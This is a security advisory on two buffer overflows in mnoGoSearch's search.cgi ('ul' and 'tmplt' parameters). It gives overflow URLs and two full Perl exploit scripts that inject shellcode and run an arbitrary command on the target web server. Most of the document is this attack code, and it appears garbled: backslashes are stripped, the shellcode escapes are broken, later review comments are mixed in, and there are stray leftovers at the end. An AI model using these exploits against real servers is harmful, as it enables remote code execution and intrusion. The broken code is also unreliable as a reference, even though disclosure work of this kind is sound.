mnoGoSearch Vulnerable to Buffer Overflow Vulnerabilities (ul, tmplt)

Summary

mnoGoSearch is a full-featured SQL-based web search engine. Two vulnerabilities in the product allow attackers to overflow two of its internal buffers, causing the program to crash and possibly execute arbitrary code.

Credit:

The information has been provided by pokleyzz.


Details

Vulnerable systems:
 * mnoGoSearch version 3.1.20
 * mnoGoSearch version 3.2.10

Overflow in ‘ul’ parameter:
The 'ul' variable is used to limit search results to a specific URL. By supplying a crafted 'ul' variable of more than 5000 characters, a user can write an arbitrary address and run commands as the web server user.

Example:
http://blablabla.com/cgi-bin/search.cgi?ul=[6000 A's]

Overflow in ‘tmplt’ parameter:
A user can crash search.cgi by supplying a 'tmplt' variable of over 1024 characters. This is a stack-based buffer overflow in which EIP is easily overwritten.

Example:
http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050 A's]

Vendor response:
The vendor was contacted on 01/06/2003 and a fix is available from CVS at http://www.mnogosearch.org.

Exploits:
Exploit for ul overflow:
#!/usr/bin/perl
#
# [ reloaded ]
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d’scan clanz (05-2003)
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt,
# kerengge_kurus, b0iler and d’scan clanz.
#
# Shout to:
# #mybsd, #mylinux, #vuln
#
# Special thanks:
# Skywizard of mybsd
#
# —————————————————————————-
# ‘TEH TARIK-WARE LICENSE’ (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a ‘teh tarik’ in return.
# —————————————————————————-
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = ‘127.0.0.1’;
$cmd = ‘ls -la’;
$searchpath = ‘/cgi-bin/search.cgi’;
$rawret = 0xbfff105c;
$ret = ”;
$suffsize = 0;
$port = 80;

my $conn;

if ($ARGV[0]){
  $host = $ARGV[0];
}
else {
  print ‘[x] mnogosearch 3.1.x exploit for linux ix86 ntby pokleyzz of d’ scan clanznn’;
  print ‘Usage:n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]n’;
  print ‘thostthostname to exploitn’;
  print ‘tcommandtcommand to execute on servern’;
  print ‘tpathtpath to search.cgi default /cgi-bin/search.cgin’;
  print ‘tporttport to connect ton’;
  print ‘tsufftif not success try to use 1, 2 or 3 for suff (default is 0)n’;
  print ‘trettreturn address default bfffd0d0n’;
  exit;
}

if ($ARGV[1]){
  $cmd = $ARGV[1];
}
if ($ARGV[2]){
  $searchpath = $ARGV[2];
}
if ($ARGV[3]){
  $port = int($ARGV[3]);
}
if ($ARGV[4]){
  $suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
  $rawret = hex_to_int($ARGV[5]);
}

#########~~ start function ~~#########
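sub hex_to_int {
  # Convert an 8-digit hex string (e.g. 'bfff105c') to its integer value,
  # two hex digits at a time, most significant byte first.
  #
  # $hs - hex string; only the first eight characters are read, and for a
  #       shorter string the missing bytes contribute 0 (hex of an empty
  #       substring), as in the original.
  # Returns the integer value.
  my ($hs) = @_;
  # Lexical result and explicit return: the original assigned to an
  # undeclared package global $int and relied on the implicit
  # last-expression return (and carried a stray '+ +').
  my $int = (hex(substr($hs, 0, 2)) << 24)
          + (hex(substr($hs, 2, 2)) << 16)
          + (hex(substr($hs, 4, 2)) << 8)
          +  hex(substr($hs, 6, 2));
  return $int;
}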

sub int_to_hex {
  # Format an integer as lowercase hex with no '0x' prefix and no zero
  # padding ('%x').
  # $in - integer to format.
  # Returns the hex string via the implicit last-expression return; the
  # value is also left in the undeclared package global $hex.
  my $in = $_[0];
  $hex = sprintf ‘%x’,$in;
}

sub string_to_ret {
  my $rawret = $_[0];
  if (length($rawret) != 8){
    print $rawret;
    die ‘[*] incorrect return address …n ‘;
  } else {
    $ret = chr(hex(substr($rawret, 2, 2)));
    $ret .= chr(hex(substr($rawret, 0, 2)));
    $ret .= chr(hex(substr($rawret, 6, 2)));
        $ret .= chr(hex(substr($rawret, 4, 2)));
        
  }
  
}

sub connect_to {
  # Open a TCP connection to $host:$port (file-level globals, overridden
  # from @ARGV at the top of the script) and store the handle in the
  # file-level $conn so the other subs can read from and write to it.
  # Dies when the connect fails.
  #print ‘[x] Connect to $host on port $port …n’;
  $conn = IO::Socket::INET->new (
          Proto => ‘tcp’,
          PeerAddr => ‘$host’,
          PeerPort => ‘$port’,
          ) or die ‘[*] Can’t connect to $host on port $port …n’;
  # Unbuffered so every print on $conn is sent immediately.
  $conn-> autoflush(1);
}

sub check_version {
  # Fingerprint probe: request $searchpath with tmplt=/test/testing123 and
  # look for '_test_' in the response; dies (ending the script) when that
  # marker is absent.
  # NOTE(review): from the defender's side this probe is itself a usable
  # log signature -- a 'tmplt=' value naming a non-existent template path
  # in search.cgi access logs warrants a look.
  my $result;
  connect_to();
  print ‘[x] Check if $host use correct version …n’;
  print $conn ‘GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnConnection: Closenn’;
  
  # capture result ($line is an undeclared package global here)
  while ($line = <$conn>) {
    $result .= $line;
    };
  
  close $conn;
  if ($result =~ /_test_/){
    print ‘[x] Correct version detected .. possibly vulnerable …n’;
  } else {
    print $result;
    die ‘[x] New version or wrong urln’;
  }
}

sub exploit {
  my $rw = $_[0];
  $result = ”;
  # linux ix86 shellcode rip from phx.c by proton
  $shellcode = ‘xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08′
               .’xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88′
               .’x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd’
               .’x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41′
               .’x41x41′
               .’/bin/sh -c echo ‘Content-Type: text/hello’;echo ”;’
               .’$cmd’
               .’@’;
  $strret = int_to_hex($rw);
  $ret = string_to_ret($strret);
  $envvar = ‘B’ x (4096 – length($shellcode));
  $envvar .= $shellcode;
  
  # generate query string
  $buffer = ‘B’ x $suffsize;
  $buffer .= ‘B’ x 4800;
  $buffer .= $ret x 200;
  
  $request = ‘GET $searchpath?ul=$buffer HTTP/1.1n’
       .’Accept: $envvarn’
       .’Accept-Language: $envvarn’
       .’Accept-Encoding: $envvarn’
       .’User-Agent: Mozilla/4.0n’
       .’Host: $hostn’
       .’Connection: Closenn’;
  
  &connect_to;
  print ‘[x] Sending exploit code ..n’;
  print ‘[x] ret: $strretn’;
  print ‘[x] suf: $suffsizen’;
  print ‘[x] length:’,length($request),’n’;
  print $conn ‘$request’;
  while ($line = <$conn>) {
    $result .= $line;
    };
  close $conn;
  
}

sub check_result {
  if ($result =~ /hello/ && !($result =~ /text/html/)){
    print $result;
    $success = 1;
  } else {
    print $result;
    print ‘[*] Failed …n’;
    $success = 0;
  }
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
  &exploit($rawret);
  &check_result;
  if ($success == 1){
    exit;
  }
  sleep 1;
}

# generate shellcode

Exploit for tmplt overflow:
#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d’scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d’scan clan.
#
# Special thanks:
# Skywizard of mybsd
#
#
# —————————————————————————-
# ‘TEH TARIK-WARE LICENSE’ (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a ‘teh tarik’ in return.
# —————————————————————————-
# (Base on Poul-Henning Kamp Beerware)
#

use IO::Socket;

my $host = ‘127.0.0.1’;
my $port = 80;
my $searchpath = ‘/cgi-bin/search.cgi’;
my $envsize = 4096;
my $suffsize = 3;
my $rawret = ‘bfffd666’;
my $ret;
my $cmd = ‘ls -l’;
my $conn;

if ($ARGV[0]){
  $host = $ARGV[0];
}
else {
  print ‘[x] mnogosearch 3.2.x exploit for linux ix86 ntby pokleyzz and s0cket370 of d’ scan clannn’;
  print ‘Usage: n mencari_asal_usul.pl hostname [command ] [path] [port] [suff] [ret]n’;
  print ‘t- if not success try to use 0,1 or 2 for suff (default is 3)’;
  exit;
}

if ($ARGV[1]){
  $cmd = $ARGV[1];
}
if ($ARGV[2]){
  $searchpath = $ARGV[2];
}
if ($ARGV[3]){
  $port = int($ARGV[3]);
}
if ($ARGV[4]){
  $suffsize = int($ARGV[4]);
}
if ($ARGV[5]){
  $rawret = $ARGV[5];
}

# linux ix86 shellcode rip from phx.c by proton
my $shellcode = ‘xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08′
             .’xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88′
             .’x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd’
             .’x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41′
             .’x41x41′
             .’/bin/sh -c echo ‘Content-Type: text/hello’;echo ”;’
             .’$cmd’
             .’@’;

sub string_to_ret {
  my $rawret = $_[0];
  if (length($rawret) != 8){
    print $rawret;
    die ‘[*] incorrect return address …n ‘;
  } else {
    $ret = chr(hex(substr($rawret, 6, 2)));
    $ret .= chr(hex(substr($rawret, 4, 2)));
    $ret .= chr(hex(substr($rawret, 2, 2)));
        $ret .= chr(hex(substr($rawret, 0, 2)));
        
  }
  
}

sub connect_to {
  # Open a TCP connection to $host:$port (file-level lexicals, overridden
  # from @ARGV at the top of the script) and store the handle in the
  # file-level $conn so the other subs can read from and write to it.
  # Dies when the connect fails.
  print ‘[x] Connect to $host on port $port …n’;
  $conn = IO::Socket::INET->new (
          Proto => ‘tcp’,
          PeerAddr => ‘$host’,
          PeerPort => ‘$port’,
          ) or die ‘[*] Can’t connect to $host on port $port …n’;
  # Unbuffered so every print on $conn is sent immediately.
  $conn-> autoflush(1);
}

sub check_version {
  # Fingerprint probe: request $searchpath with tmplt=/test/testing123 and
  # test the response against the regex below; dies (ending the script)
  # when it does not match.
  # NOTE(review): from the defender's side this probe is itself a usable
  # log signature -- a 'tmplt=' value naming a non-existent template path
  # in search.cgi access logs warrants a look.
  my $result;
  connect_to();
  print ‘[x] Check if $host use correct version …n’;
  print $conn ‘GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnn’;
  
  # capture result ($line is an undeclared package global here)
  while ($line = <$conn>) {
    $result .= $line;
    };
  
  close $conn;
  if ($result =~ //test//){
    print ‘[x] Correct version.. possibly vulnerable …n’;
  } else {
    print $result;
    die ‘[x] Old version or wrong urln’;
  }
}

# start exploiting …
sub exploit {

  # generate environment variable for http request
  $envvar = ‘A’ x (4096 – length($shellcode));
  $envvar .= $shellcode;
  
  # generate query request
  $query = ‘A’ x $suffsize;
  $query .= $ret x 258;
  
  # generate request
  $request = ‘GET $searchpath?tmplt=$query HTTP/1.1n’
       .’Accept: $envvarn’
       .’Accept-Language: $envvarn’
       .’Accept-Encoding: $envvarn’
       .’User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)n’
       .’Host: $hostn’
       .’Connection: Closenn’;
  
  print ‘[x] Trying to execute command … n’;
  print ‘[x] Return address : $rawret n’;
  print ‘[x] Suffix size : $suffsize n’;
  connect_to();
  print $conn ‘$request’;
  
  # capture result
  while ($line = <$conn>) {
    $result .= $line;
    };
  close $conn;
  
  if ($result =~ /hello/){
    print $result;
  } else {
    print ‘[*] Failed …n’;
  }
}

&string_to_ret($rawret);
&check_version;
&exploit;’
